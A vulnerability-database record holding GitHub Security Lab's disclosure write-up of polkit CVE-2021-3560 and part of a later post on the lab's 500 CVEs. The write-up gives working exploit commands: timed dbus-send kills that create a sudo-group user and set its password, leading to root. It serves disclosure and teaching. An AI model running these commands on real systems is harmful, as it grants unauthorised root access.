works if\n`gnome-control-center` is installed: it adds the `policykit.imply` annotation\nthat enables me to target `accountsservice`.
That does not mean that RHEL is\nsafe from this vulnerability, though. Another attack vector for the\nvulnerability is [`packagekit`](https://packagekit.freedesktop.org/), which is\ninstalled by default on RHEL and has a suitable `policykit.imply` annotation\nfor the `package-install` action. `packagekit` is used to install packages, so\nit can be exploited to install `gnome-control-center`, after which the rest of\nthe exploit works as before.\n\n## Conclusion\n\nCVE-2021-3560 enables an unprivileged local attacker to gain root privileges.\nIt's very simple and quick to exploit, so it's important that you update your\nLinux installations as soon as possible. Any system that has polkit version\n0.113 (or later) installed is vulnerable. That includes popular distributions\nsuch as RHEL 8 and Ubuntu 20.04.\n\nAnd if you like nerding out about security vulnerabilities (and how to fix\nthem) check out some of the other work that the [Security\nLab](https://securitylab.github.com/) team is doing or follow us on\n[Twitter](https://twitter.com/GHSecurityLab).\n\n**Tags:** [GitHub Security Lab](https://github.blog/tag/github-security-lab/)", "cvss3": {}, "published": "2021-06-15T00:00:00", "type": "seebug", "title": "Linux Polkit\u6743\u9650\u63d0\u5347\u6f0f\u6d1e\uff08CVE-2021-3560\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-15790", "CVE-2021-3560"], "modified": "2021-06-15T00:00:00", "id": "SSV:99275", "href": "https://www.seebug.org/vuldb/ssvid-99275", "sourceData": "", "sourceHref": "", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}], "github": [{"lastseen": "2021-07-28T15:17:29", "description": "[polkit](<https://gitlab.freedesktop.org/polkit/polkit/>) is a system service installed by default on many Linux distributions. It\u2019s used by [systemd](<https://systemd.io/>), so any Linux distribution that uses systemd also uses polkit. 
As a member of [GitHub Security Lab](<https://securitylab.github.com/>), my job is to help improve the security of open source software by finding and reporting vulnerabilities. A few weeks ago, I found a privilege escalation vulnerability in polkit. I coordinated the disclosure of the vulnerability with the polkit maintainers and with [Red Hat\u2019s security team.](<https://access.redhat.com/security/overview/>) It was publicly disclosed, the fix was released on June 3, 2021, and it was assigned [CVE-2021-3560](<https://access.redhat.com/security/cve/CVE-2021-3560>).\n\nThe vulnerability enables an unprivileged local user to get a root shell on the system. It\u2019s easy to exploit with a few standard command line tools, as you can see in this [short video](<https://youtu.be/QZhz64yEd0g>). In this blog post, I\u2019ll explain how the exploit works and show you where the bug was in the source code.\n\n**Table of contents**\n\n * History of CVE-2021-3560 and vulnerable distributions\n * About polkit\n * Exploitation steps\n * polkit architecture\n * The vulnerability\n * org.freedesktop.policykit.imply annotations\n * Conclusion\n\n## History of CVE-2021-3560 and vulnerable distributions\n\nThe bug I found was quite old. It was introduced seven years ago in commit [bfa5036](<https://gitlab.freedesktop.org/polkit/polkit/-/commit/bfa5036bfb93582c5a87c44b847957479d911e38>) and first shipped with polkit version 0.113. However, many of the most popular Linux distributions didn\u2019t ship the vulnerable version until more recently.\n\nThe bug has a slightly different history on [Debian](<https://www.debian.org/>) and its derivatives (such as [Ubuntu](<https://ubuntu.com/>)), because Debian uses a [fork of polkit](<https://salsa.debian.org/utopia-team/polkit>) with a different version numbering scheme. 
In the Debian fork, the bug was introduced in commit [f81d021](<https://salsa.debian.org/utopia-team/polkit/-/commit/f81d021e3cb97a0816285eb95c2a77f554d30966>) and first shipped with version 0.105-26. The most recent stable release of Debian, [Debian 10 (\u201cbuster\u201d)](<https://www.debian.org/releases/buster/>), uses version 0.105-25, which means that it isn\u2019t vulnerable. However, some Debian derivatives, such as Ubuntu, are based on [Debian unstable](<https://www.debian.org/releases/sid/>), which is vulnerable.\n\nHere\u2019s a table with a selection of popular distributions and whether they\u2019re vulnerable (note that this isn\u2019t a comprehensive list):\n\nDistribution | Vulnerable? \n---|--- \nRHEL 7 | No \nRHEL 8 | [Yes](<https://access.redhat.com/security/cve/CVE-2021-3560>) \nFedora 20 (or earlier) | No \nFedora 21 (or later) | [Yes](<https://bugzilla.redhat.com/show_bug.cgi?id=1967424>) \nDebian 10 (\u201cbuster\u201d) | No \nDebian testing (\u201cbullseye\u201d) | [Yes](<https://security-tracker.debian.org/tracker/CVE-2021-3560>) \nUbuntu 18.04 | No \nUbuntu 20.04 | [Yes](<https://ubuntu.com/security/CVE-2021-3560>) \n \n## About polkit\n\n[polkit](<https://gitlab.freedesktop.org/polkit/polkit/>) is the system service that\u2019s running under the hood when you see a dialog box like the one below:\n\n\n\nIt essentially plays the role of a judge. If you want to do something that requires higher privileges--for example, creating a new user account--then it\u2019s polkit\u2019s job to decide whether or not you\u2019re allowed to do it. For some requests, polkit will make an instant decision to allow or deny, and for others it will pop up a dialog box so that an administrator can grant authorization by entering their password.\n\nThe dialog box might give the impression that polkit is a graphical system, but it\u2019s actually a background process. 
The dialog box is known as an _authentication agent_ and it\u2019s really just a mechanism for sending your password to polkit. To illustrate that polkit isn\u2019t just for graphical sessions, try running this command in a terminal:\n \n \n pkexec reboot\n\n[`pkexec`](<https://manpages.ubuntu.com/manpages/focal/en/man1/pkexec.1.html>) is a similar command to [`sudo`](<https://manpages.ubuntu.com/manpages/focal/en/man8/sudo.8.html>), which enables you to run a command as root. If you run `pkexec` in a graphical session, it will pop up a dialog box, but if you run it in a text-mode session such as SSH then it starts its own text-mode authentication agent:\n \n \n $ pkexec reboot\n ==== AUTHENTICATING FOR org.freedesktop.policykit.exec ===\n Authentication is needed to run `/usr/sbin/reboot' as the super user\n Authenticating as: Kevin Backhouse,,, (kev)\n Password:\n\nAnother command that you can use to trigger `polkit` from the command line is [`dbus-send`](<https://manpages.ubuntu.com/manpages/focal/en/man1/dbus-send.1.html>). It\u2019s a general purpose tool for sending D-Bus messages that\u2019s mainly used for testing, but it\u2019s usually installed by default on systems that use D-Bus. It can be used to simulate the D-Bus messages that the graphical interface might send. For example, this is the command to create a new user:\n \n \n dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:boris string:\"Boris Ivanovich Grishenko\" int32:1\n\nIf you run that command in a graphical session, an authentication dialog box will pop up, but if you run it in a text-mode session such as [SSH](<https://www.openssh.com/>), then it fails immediately. That\u2019s because, unlike `pkexec`, `dbus-send` does not start its own authentication agent.\n\n## Exploitation steps\n\nThe vulnerability is surprisingly easy to exploit. 
All it takes is a few commands in the terminal using only standard tools like [`bash`](<https://manpages.ubuntu.com/manpages/focal/en/man1/bash.1.html>), [`kill`](<https://manpages.ubuntu.com/manpages/focal/en/man1/kill.1.html>), and [`dbus-send`](<https://manpages.ubuntu.com/manpages/focal/en/man1/dbus-send.1.html>).\n\nThe proof of concept (PoC) exploit I describe in this section depends on two packages being installed: `accountsservice` and `gnome-control-center`. On a graphical system such as Ubuntu Desktop, both of those packages are usually installed by default. But if you\u2019re using something like a non-graphical RHEL server, then you might need to install them, like this:\n \n \n sudo yum install accountsservice gnome-control-center\n\nOf course, the vulnerability doesn\u2019t have anything specifically to do with either `accountsservice` or `gnome-control-center`. They\u2019re just polkit clients that happen to be convenient vectors for exploitation. The reason why the PoC depends on `gnome-control-center` and not just `accountsservice` is subtle--I\u2019ll explain that later.\n\nTo avoid repeatedly triggering the authentication dialog box (which can be annoying), I recommend running the commands from an SSH session:\n \n \n ssh localhost\n\nThe vulnerability is triggered by starting a `dbus-send` command but killing it while polkit is still in the middle of processing the request. I like to think that it\u2019s theoretically possible to trigger by smashing Ctrl+C at just the right moment, but I\u2019ve never succeeded, so I do it with a small amount of bash scripting instead. 
First, you need to measure how long it takes to run the `dbus-send` command normally:\n \n \n time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:boris string:\"Boris Ivanovich Grishenko\" int32:1\n\nThe output will look something like this:\n \n \n Error org.freedesktop.Accounts.Error.PermissionDenied: Authentication is required\n \n real 0m0.016s\n user 0m0.005s\n sys 0m0.000s\n\nThat took 16 milliseconds for me, so that means that I need to kill the `dbus-send` command after approximately 8 milliseconds:\n \n \n dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:boris string:\"Boris Ivanovich Grishenko\" int32:1 & sleep 0.008s ; kill $!\n\nYou might need to run that a few times, and you might need to experiment with the number of milliseconds in the delay. When the exploit succeeds, you\u2019ll see that a new user named `boris` has been created:\n \n \n $ id boris\n uid=1002(boris) gid=1002(boris) groups=1002(boris),27(sudo)\n\nNotice that `boris` is a member of the `sudo` group, so you\u2019re already well on your way to full privilege escalation. Next, you need to set a password for the new account. 
The D-Bus interface expects a hashed password, which you can create using `openssl`:\n \n \n $ openssl passwd -5 iaminvincible!\n $5$Fv2PqfurMmI879J7$ALSJ.w4KTP.mHrHxM2FYV3ueSipCf/QSfQUlATmWuuB\n\nNow you just have to do the same trick again, except this time call the `SetPassword` D-Bus method:\n \n \n dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1002 org.freedesktop.Accounts.User.SetPassword string:'$5$Fv2PqfurMmI879J7$ALSJ.w4KTP.mHrHxM2FYV3ueSipCf/QSfQUlATmWuuB' string:GoldenEye & sleep 0.008s ; kill $!\n\nAgain, you might need to experiment with the length of the delay and run it several times until it succeeds. Also, note that you need to paste in the correct user identifier (UID), which is \u201c1002\u201d in this example, plus the password hash from the `openssl` command.\n\nNow you can login as boris and become root:\n \n \n su - boris # password: iaminvincible!\n sudo su # password: iaminvincible!\n\n\n\n## polkit architecture\n\nTo help explain the vulnerability, here\u2019s a diagram of the five main processes involved during the `dbus-send` command:\n\n\n\nThe two processes above the dashed line--`dbus-send` and the authentication agent--are unprivileged user processes. Those below the line are privileged system processes. In the center is `dbus-daemon`, which handles all of the communication: the other four processes communicate with each other by sending D-Bus messages.\n\n`dbus-daemon` plays a very important role in the security of polkit, because it enables the four processes to communicate securely and check each other\u2019s credentials. For example, when the authentication agent sends an authentication cookie to polkit, it does so by sending it to the `org.freedesktop.PolicyKit1` D-Bus address. Since that address is only allowed to be registered by a root process, there is no risk of an unprivileged process intercepting messages. 
`dbus-daemon` also assigns every connection a \u201cunique bus name:\u201d typically something like ":1.96". It\u2019s a bit like a process identifier (PID), except without being vulnerable to [PID recycling attacks](<https://securitylab.github.com/research/ubuntu-apport-CVE-2019-15790/>). Unique bus names are currently chosen from a 64-bit range, so there\u2019s no risk of a vulnerability caused by a name being reused.\n\nThis is the sequence of events:\n\n 1. `dbus-send` asks `accounts-daemon` to create a new user.\n 2. `accounts-daemon` receives the D-Bus message from `dbus-send`. The message includes the unique bus name of the sender. Let\u2019s assume it\u2019s ":1.96". This name is attached to the message by `dbus-daemon` and cannot be forged.\n 3. `accounts-daemon` asks polkit if connection :1.96 is authorized to create a new user.\n 4. polkit asks `dbus-daemon` for the UID of connection :1.96.\n 5. If the UID of connection :1.96 is \u201c0,\u201d then polkit immediately authorizes the request. Otherwise, it sends the authentication agent a list of administrator users who are allowed to authorize the request.\n 6. The authentication agent opens a dialog box to get the password from the user.\n 7. The authentication agent sends the password to polkit.\n 8. polkit sends a \u201cyes\u201d reply back to `accounts-daemon`.\n 9. `accounts-daemon` creates the new user account.\n\n## The vulnerability\n\nWhy does killing the `dbus-send` command cause an authentication bypass? The vulnerability is in step four of the sequence of events listed above. What happens if polkit asks `dbus-daemon` for the UID of connection :1.96, but connection :1.96 no longer exists? `dbus-daemon` handles that situation correctly and returns an error. But it turns out that polkit does not handle that error correctly. In fact, polkit mishandles the error in a particularly unfortunate way: rather than rejecting the request, it treats the request as though it came from a process with UID 0. 
In other words, it immediately authorizes the request because it thinks the request has come from a root process.\n\nWhy is the timing of the vulnerability non-deterministic? It turns out that polkit asks `dbus-daemon` for the UID of the requesting process multiple times, on different codepaths. Most of those codepaths handle the error correctly, but one of them doesn\u2019t. If you kill the `dbus-send` command early, it\u2019s handled by one of the correct codepaths and the request is rejected. To trigger the vulnerable codepath, you have to disconnect at just the right moment. And because there are multiple processes involved, the timing of that \u201cright moment\u201d varies from one run to the next. That\u2019s why it usually takes a few tries for the exploit to succeed. I\u2019d guess it\u2019s also the reason why the bug wasn\u2019t previously discovered. If you could trigger the vulnerability by killing the `dbus-send` command immediately, then I expect it would have been discovered a long time ago, because that\u2019s a much more obvious thing to test for.\n\nThe function which asks `dbus-daemon` for the UID of the requesting connection is named [`polkit_system_bus_name_get_creds_sync`](<https://gitlab.freedesktop.org/polkit/polkit/-/blob/bfa5036bfb93582c5a87c44b847957479d911e38/src/polkit/polkitsystembusname.c#L388>):\n \n \n static gboolean\n polkit_system_bus_name_get_creds_sync (\n PolkitSystemBusName *system_bus_name,\n guint32 *out_uid,\n guint32 *out_pid,\n GCancellable *cancellable,\n GError **error)\n\nThe behavior of [`polkit_system_bus_name_get_creds_sync`](<https://gitlab.freedesktop.org/polkit/polkit/-/blob/ff4c2144f0fb1325275887d9e254117fcd8a1b52/src/polkit/polkitsystembusname.c#L388>) is strange, because when an error occurs, the function sets the error parameter but still returns `TRUE`. 
It wasn\u2019t clear to me, when I wrote my [bug report](<https://gitlab.freedesktop.org/polkit/polkit/-/issues/140>), whether that was a bug or a deliberate design choice. (It turns out that it was a bug, because the polkit developers have [fixed the vulnerability](<https://gitlab.freedesktop.org/polkit/polkit/-/commit/a04d13affe0fa53ff618e07aa8f57f4c0e3b9b81>) by returning `FALSE` on error.) My uncertainty arose from the fact that _almost all_ the callers of `polkit_system_bus_name_get_creds_sync` don\u2019t just check the Boolean result, but also check that the error value is still `NULL` before proceeding. The cause of the vulnerability was that the error value wasn\u2019t checked in the following stack trace:\n \n \n 0 in polkit_system_bus_name_get_creds_sync of [polkitsystembusname.c:388](<https://gitlab.freedesktop.org/polkit/polkit/-/blob/ff4c2144f0fb1325275887d9e254117fcd8a1b52/src/polkit/polkitsystembusname.c#L388>)\n 1 in polkit_system_bus_name_get_user_sync of [polkitsystembusname.c:511](<https://gitlab.freedesktop.org/polkit/polkit/-/blob/ff4c2144f0fb1325275887d9e254117fcd8a1b52/src/polkit/polkitsystembusname.c#L511>)\n 2 in polkit_backend_session_monitor_get_user_for_subject of [polkitbackendsessionmonitor-systemd.c:303](<https://gitlab.freedesktop.org/polkit/polkit/-/blob/ff4c2144f0fb1325275887d9e254117fcd8a1b52/src/polkitbackend/polkitbackendsessionmonitor-systemd.c#L303>)\n 3 in check_authorization_sync of [polkitbackendinteractiveauthority.c:1121](<https://gitlab.freedesktop.org/polkit/polkit/-/blob/ff4c2144f0fb1325275887d9e254117fcd8a1b52/src/polkitbackend/polkitbackendinteractiveauthority.c#L1121>)\n 4 in check_authorization_sync of [polkitbackendinteractiveauthority.c:1227](<https://gitlab.freedesktop.org/polkit/polkit/-/blob/ff4c2144f0fb1325275887d9e254117fcd8a1b52/src/polkitbackend/polkitbackendinteractiveauthority.c#L1227>)\n 5 in polkit_backend_interactive_authority_check_authorization of 
[polkitbackendinteractiveauthority.c:981](<https://gitlab.freedesktop.org/polkit/polkit/-/blob/ff4c2144f0fb1325275887d9e254117fcd8a1b52/src/polkitbackend/polkitbackendinteractiveauthority.c#L981>)\n 6 in polkit_backend_authority_check_authorization of [polkitbackendauthority.c:227](<https://gitlab.freedesktop.org/polkit/polkit/-/blob/ff4c2144f0fb1325275887d9e254117fcd8a1b52/src/polkitbackend/polkitbackendauthority.c#L227>)\n 7 in server_handle_check_authorization of [polkitbackendauthority.c:790](<https://gitlab.freedesktop.org/polkit/polkit/-/blob/ff4c2144f0fb1325275887d9e254117fcd8a1b52/src/polkitbackend/polkitbackendauthority.c#L790>)\n 8 in server_handle_method_call of [polkitbackendauthority.c:1272](<https://gitlab.freedesktop.org/polkit/polkit/-/blob/ff4c2144f0fb1325275887d9e254117fcd8a1b52/src/polkitbackend/polkitbackendauthority.c#L1272>)\n\nThe bug is in this snippet of code in [`check_authorization_sync`](<https://gitlab.freedesktop.org/polkit/polkit/-/blob/ff4c2144f0fb1325275887d9e254117fcd8a1b52/src/polkitbackend/polkitbackendinteractiveauthority.c#L1121>):\n \n \n /* every subject has a user; this is supplied by the client, so we rely\n * on the caller to validate its acceptability. */\n user_of_subject = polkit_backend_session_monitor_get_user_for_subject (priv->session_monitor,\n subject, NULL,\n error);\n if (user_of_subject == NULL)\n goto out;\n \n /* special case: uid 0, root, is _always_ authorized for anything */\n if (POLKIT_IS_UNIX_USER (user_of_subject) && polkit_unix_user_get_uid (POLKIT_UNIX_USER (user_of_subject)) == 0)\n {\n result = polkit_authorization_result_new (TRUE, FALSE, NULL);\n goto out;\n }\n\nNotice that the value of `error` is not checked.\n\n## `org.freedesktop.policykit.imply` annotations\n\nI mentioned earlier that my PoC depends on `gnome-control-center` being installed, in addition to `accountsservice`. Why is that? 
The PoC doesn\u2019t use `gnome-control-center` in any visible way, and I didn\u2019t even realize that I was depending on it when I wrote the PoC! In fact, I only found out because the Red Hat security team couldn\u2019t reproduce my PoC on RHEL. When I tried it for myself on a RHEL 8.4 VM, I also found that the PoC didn\u2019t work. That was puzzling, because it was working beautifully on Fedora 32 and CentOS Stream. The crucial difference, it turned out, was that my RHEL VM was a non-graphical server with no GNOME installed. So why does that matter? The answer is `policykit.imply` annotations.\n\nSome polkit actions are essentially equivalent to each other, so if one has already been authorized then it makes sense to silently authorize the other. The GNOME settings dialog is a good example:\n\n\n\nAfter you\u2019ve clicked the \u201cUnlock\u201d button and entered your password, you can do things like adding a new user account without having to authenticate a second time. That\u2019s handled by a `policykit.imply` annotation, which is defined in this [config file](<https://gitlab.gnome.org/GNOME/gnome-control-center/-/blob/54eb734eaaa95807dd805fbe4e4ad0dceb787736/panels/user-accounts/org.gnome.controlcenter.user-accounts.policy.in>):\n \n \n /usr/share/polkit-1/actions/org.gnome.controlcenter.user-accounts.policy\n\nThe config file contains the following implication:\n\n\n\nIn other words, if you\u2019re authorized to perform `controlcenter` admin actions, then you\u2019re also authorized to perform `accountsservice` admin actions.\n\nWhen I attached [GDB](<https://www.gnu.org/software/gdb/>) to polkit on my RHEL VM, I found that I wasn\u2019t seeing the vulnerable stack trace that I listed earlier. Notice that step four of the stack trace is a recursive call from `check_authorization_sync` to itself. 
That happens on [line 1227](<https://gitlab.freedesktop.org/polkit/polkit/-/blob/ff4c2144f0fb1325275887d9e254117fcd8a1b52/src/polkitbackend/polkitbackendinteractiveauthority.c#L1227>), which is where polkit checks the `policykit.imply` annotations:\n \n \n PolkitAuthorizationResult *implied_result = NULL;\n PolkitImplicitAuthorization implied_implicit_authorization;\n GError *implied_error = NULL;\n const gchar *imply_action_id;\n \n imply_action_id = polkit_action_description_get_action_id (imply_ad);\n \n /* g_debug (\"%s is implied by %s, checking\", action_id, imply_action_id); */\n implied_result = check_authorization_sync (authority, caller, subject,\n imply_action_id,\n details, flags,\n &implied_implicit_authorization, TRUE,\n &implied_error);\n if (implied_result != NULL)\n {\n if (polkit_authorization_result_get_is_authorized (implied_result))\n {\n g_debug (\" is authorized (implied by %s)\", imply_action_id);\n result = implied_result;\n /* cleanup */\n g_strfreev (tokens);\n goto out;\n }\n g_object_unref (implied_result);\n }\n if (implied_error != NULL)\n g_error_free (implied_error);\n\nThe authentication bypass depends on the error value getting ignored. It was ignored on [line 1121](<https://gitlab.freedesktop.org/polkit/polkit/-/blob/ff4c2144f0fb1325275887d9e254117fcd8a1b52/src/polkitbackend/polkitbackendinteractiveauthority.c#L1121>), but it\u2019s still stored in the `error` parameter, so it also needs to be ignored by the caller. The block of code above has a temporary variable named `implied_error`, which is ignored when `implied_result` isn\u2019t null. That\u2019s the crucial step that makes the bypass possible.\n\nTo sum up, the authentication bypass only works on polkit actions that are implied by another polkit action. That\u2019s why my PoC only works if `gnome-control-center` is installed: it adds the `policykit.imply` annotation that enables me to target `accountsservice`. 
That does not mean that RHEL is safe from this vulnerability, though. Another attack vector for the vulnerability is [`packagekit`](<https://packagekit.freedesktop.org/>), which is installed by default on RHEL and has a suitable `policykit.imply` annotation for the `package-install` action. `packagekit` is used to install packages, so it can be exploited to install `gnome-control-center`, after which the rest of the exploit works as before.\n\n## Conclusion\n\nCVE-2021-3560 enables an unprivileged local attacker to gain root privileges. It\u2019s very simple and quick to exploit, so it\u2019s important that you update your Linux installations as soon as possible. Any system that has polkit version 0.113 (or later) installed is vulnerable. That includes popular distributions such as RHEL 8 and Ubuntu 20.04.\n\nAnd if you like nerding out about security vulnerabilities (and how to fix them) check out some of the other work that the [Security Lab](<https://securitylab.github.com/>) team is doing or follow us on [Twitter](<https://twitter.com/GHSecurityLab>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 3.3, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 1.4}, "published": "2021-06-10T16:00:52", "type": "github", "title": "Privilege escalation with polkit: How to get root on Linux with a seven-year-old bug", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": 
"AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15790", "CVE-2021-3560"], "modified": "2021-06-10T23:45:05", "id": "GITHUB:D8A86B15D051270840BFEF47E7434ED2", "href": "https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-09-22T05:21:35", "description": "When I stepped onto the scale this morning, I remembered that there are some numbers that feel awkward to celebrate, while perhaps some others are worth celebrating! Recently, the GitHub Security Lab passed the milestone of 500 CVEs disclosed to open source projects. What\u2019s a CVE? In short, it\u2019s the record of a security vulnerability, under the [CVE](<https://www.cve.org/About/Overview>) program, intended to inform impacted users. So, finding more vulnerabilities in open source shouldn\u2019t be good news, right? Even as developer communities are getting better at [keeping themselves secure](<https://octoverse.github.com/2022/developer-community>), security issues may still slip through their defenses. This means that there will always be a need for security researchers, like the Security Lab, to discover and help fix them.\n\nIf you\u2019re not familiar with the Security Lab, we\u2019re a team of security experts who work with the broader open source community to help fix security issues in their projects, with the goal of improving the overall security posture of open source. Our core activity is to audit open source projects, [not only the ones hosted on GitHub](<https://twitter.com/zemarmot/status/1681008991663423489>)\u2013and help their maintainers fix the vulnerabilities we find, for free. 
This research is foundational for our other activities, such as [education](<http://gh.io/securecodegame>), improvement of our open source [static analysis rules](<http://gh.io/codeql-wall-of-fame>), and [tooling](<https://github.blog/2023-06-26-new-tool-to-secure-your-github-actions/>). And now we are celebrating more than 500 CVEs disclosed. \n\n## How did we get here?\n\nThe history of the Security Lab dates back to Semmle, the company that created CodeQL, and which was later acquired by GitHub. 2017 was a pivotal year, as we realized how powerful our product could be for finding security vulnerabilities. Unlike many other static analysis tools, CodeQL efficiently codifies insecure patterns and responds urgently to new security threats at scale. To showcase this capability, Semmle created a small security research team who used CodeQL to search for vulnerabilities in open source projects, and a web portal named LGTM.com where all open source projects could run CodeQL for free and be alerted of potential security flaws directly within their pull requests. This approach grew into an important company objective: find and fix vulnerabilities at scale in open source. This was a way of giving back to the open source community, just like any software company should.\n\n\n\nIn September 2019, [GitHub acquired Semmle](<https://github.blog/2019-09-18-github-welcomes-semmle/>), providing an ideal home for advancing the goal of improving open source security at scale. This led to the creation of the Security Lab, with a larger team and new initiatives, including curating the [GitHub Advisory Database](<https://github.com/advisories>). The GitHub Advisory Database provides developers with the most accurate information about known security issues in their open source dependencies. 
GitHub also incorporated CodeQL as a foundation of code scanning and a core pillar of GitHub Advanced Security (GHAS), keeping it free for open source. Code scanning [reached parity with LGTM.com in 2022](<https://github.blog/2022-08-15-the-next-step-for-lgtm-com-github-code-scanning/>).\n\nWe have also expanded beyond CodeQL and now use a variety of tools in our audit activities, such as fuzzing. But CodeQL remains one of the most effective tools in our toolbox, because it enables us to conduct [variant analysis at scale](<https://github.blog/2023-03-09-multi-repository-variant-analysis-a-powerful-new-way-to-perform-security-research-across-github/>), and allows us to share our knowledge of insecure patterns with the community, in the form of executable CodeQL queries.\n\n## The secret? Our maintainers-first approach\n\nNot all reports get a CVE. CVE records are useful for informing downstream consumers, so when there is no downstream consumer, there is no need for a CVE. For example, a vulnerability in a CI workflow, or a vulnerability discovered in a development branch and fixed before it reached any release does not require a CVE. While we are credited for 500 CVEs, we have actually reported and helped fix over 1,000 vulnerabilities. But who's counting, right?\n\nThat said, what matters most to us is our fix rate. When looking at the tens of thousands of reports in the GitHub Advisory Database, on average, 80% are fixed by maintainers. However, the fix rate for vulnerabilities the Security Lab reported is much higher: 96% of our reports end up with a fix. This reflects the validity of our reports and our effective collaboration with maintainers. 
We want project maintainers to succeed, and because of that, we are flexible on the disclosure timeline\u2013when it\u2019s safe for the rest of the community\u2013we provide fix suggestions, and we always help test the new release. Our [report template is open source](<https://github.com/github/securitylab/blob/main/docs/report-template.md>) for all security researchers who would like to use it as an inspiration for their own reports.\n\nNow, let\u2019s take a look at some vulnerabilities that stand out!!\n\n## Highlights from our first 500\n\n### [CVE-2017-9805](<https://securitylab.github.com/research/apache-struts-vulnerability-cve-2017-9805/>): Remote Code Execution vulnerability in Apache Struts\n\nThe bug that started it all. Man Yue Mo found an unsafe deserialization vulnerability in Apache Struts, which enabled an unauthenticated remote attacker to execute arbitrary code. Apache Struts was already in the news at the time, because an older vulnerability\u2014[CVE-2017-5638](<https://github.com/advisories/GHSA-j77q-2qqg-6989>)\u2014had been leveraged in the [Equifax breach](<https://arstechnica.com/information-technology/2017/09/massive-equifax-breach-caused-by-failure-to-patch-two-month-old-bug/>). Mo, who at the time was still working on Semmle\u2019s data science team, found the bug by tweaking the CodeQL query for unsafe deserialization.\n\n> This is the starting point for me personally. I came across this without realizing its significance when looking at the unsafe deserialization sinks. 
This bug helped us realize the power of CodeQL and understand how it can be used to find serious vulnerabilities that are otherwise hard to find, by customizing its dataflow sources, sinks, and steps.\n\n\\- Man Yue Mo, @m-y-mo\n\n### [CVE-2018-4407](<https://securitylab.github.com/research/apple-xnu-icmp-error-CVE-2018-4407/>): Kernel crash caused by out-of-bounds write in Apple's ICMP packet-handling code\n\nBy exploiting an integer overflow in the [XNU](<https://en.wikipedia.org/wiki/XNU>) kernel\u2019s networking code, a malicious TCP packet could trigger an out-of-bounds memory access, which would instantly crash the macOS kernel ([video](<https://twitter.com/kevin_backhouse/status/1057352656560287746>)) and reboot any Mac or iOS device on the same network as the attacker, without user interaction. It even had a [tweetable poc](<https://twitter.com/ihackbanme/status/1057811965945376768>).\n\n> We recorded the video of the poc in our Oxford office. I modified the poc so that it could crash multiple devices simultaneously, but I made a mistake and accidentally broadcast it to the whole office, crashing all the Macs and iPhones in the office that day! People on the other floors had no idea what had happened. \n\n\\- Kevin Backhouse, @kevinbackhouse\n\n### [GHSL-2020-204](<https://securitylab.github.com/research/securing-the-fight-against-covid19-through-oss/>): Remote Code Execution in Corona Warn App Server\n\nA Remote Code Execution (RCE) vulnerability was found in the German application used to track COVID contacts. 
An unauthenticated attacker would have been able to fully compromise the server where citizens were sending their anonymous infection information to facilitate the tracking of the exposure of other German citizens. This is a good example of a vulnerability that did not require a CVE since the CWA app was only used and deployed by the German and Belgian governments.\n\n> This was a novel vulnerability category we found at the Security Lab. I was researching how certain data validators, in theory used to make sure that untrusted data conformed to safe patterns, could actually be abused for the opposite purpose, and actually make the application vulnerable to a different type of attack. This research led to the publication of the Bean Stalking: Growing Java beans into RCE article and soon after we found many applications vulnerable to this vulnerability, including the Corona Warn App which we promptly reported to the maintainers.\n\n\\- Alvaro Mu\u00f1oz, @pwntester\n\n### [CVE-2021-3560](<https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/>): Privilege escalation with polkit\n\npolkit is a system service installed by default on many Linux distributions, including popular distributions such as RHEL and Ubuntu. A race condition vulnerability in this library enabled an unprivileged local user to get a root shell on Linux systems. The bug was in error handling code, and could be triggered by disconnecting the client too early.\n\n> Local privilege escalation vulnerabilities on Linux are often in the kernel and require some tricky code to exploit. 
This bug was different because it was very easy to exploit by running a few commands in the terminal.\n\n\\- Kevin Backhouse, @kevinbackhouse\n\n### [CVE-2021-45046](<https://logging.apache.org/log4j/2.x/security.html>): Bypass of initial mitigations for Log4Shell\n\nDecember 2021 may be remembered by Java developers and security folks for an RCE vulnerability found in the popular Log4J logging library. The Java world faltered with what was probably the worst vulnerability ever affecting the Java ecosystem. The Apache maintainers quickly published a patch for it; however, our researchers found that the fix was not sufficient and reported a bypass affecting certain OSes to the maintainers.\n\n> Having researched and published how JNDI injections could lead to RCE back in 2016 at the BlackHat security conference, I was shocked that such a vulnerability was hidden in plain sight for so long affecting probably the most popular Java logging library. It made me realize how separated the developers and security researchers worlds actually are and how important it is to close this gap in order to build secure software.\n\n\\- Alvaro Mu\u00f1oz, @pwntester\n\n### Multiple script injections and \u201c[pwn request](<https://securitylab.github.com/research/github-actions-preventing-pwn-requests/>)\u201d vulnerabilities in implementations of GitHub Actions workflows\n\nWe noticed emerging insecure patterns in the implementation of GitHub Actions and helped fix more than a hundred instances in open source projects. 
